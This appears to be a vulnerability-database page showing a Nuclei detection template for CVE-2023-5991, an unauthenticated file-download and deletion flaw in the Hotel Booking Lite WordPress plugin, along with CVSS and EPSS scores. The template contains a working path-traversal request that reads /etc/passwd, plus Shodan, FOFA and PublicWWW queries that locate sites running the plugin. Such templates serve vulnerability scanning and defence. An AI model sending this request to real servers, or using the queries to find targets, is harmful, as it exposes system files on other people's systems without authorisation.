Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-5991
HistoryMay 14, 2024 - 10:34 a.m.

Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion

2024-05-1410:34:23
ProjectDiscovery
github.com
13
cve
lfi
motopress-hotel-booking
wordpress
wp-plugin
wpscan

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.172 Low

EPSS

Percentile

96.1%

The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
id: CVE-2023-5991

info:
  name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion
  author: Kazgangap
  severity: critical
  description: |
    The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
  remediation: Fixed in 4.8.5
  reference:
    - https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5991
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5991
    cwe-id: CWE-22
    epss-score: 0.17487
    epss-percentile: 0.96115
    cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: motopress
    product: hotel_booking_lite
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking
    fofa-query: body=/wp-content/plugins/motopress-hotel-booking
    publicwww-query: "/wp-content/plugins/motopress-hotel-booking"
  tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress

http:
  - method: GET
    path:
      - "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "filename="
          - "/etc/passwd"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008aed4131d72f2a882a3d06d2d9baa4b4e8c1587b36400dfe6e4177d7ab0dfd74022025db93ee8eb043c22cac910ae7ddafe92f578a3c00db013fe89aa59d4e0e35ff:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.172 Low

EPSS

Percentile

96.1%

Related for NUCLEI:CVE-2023-5991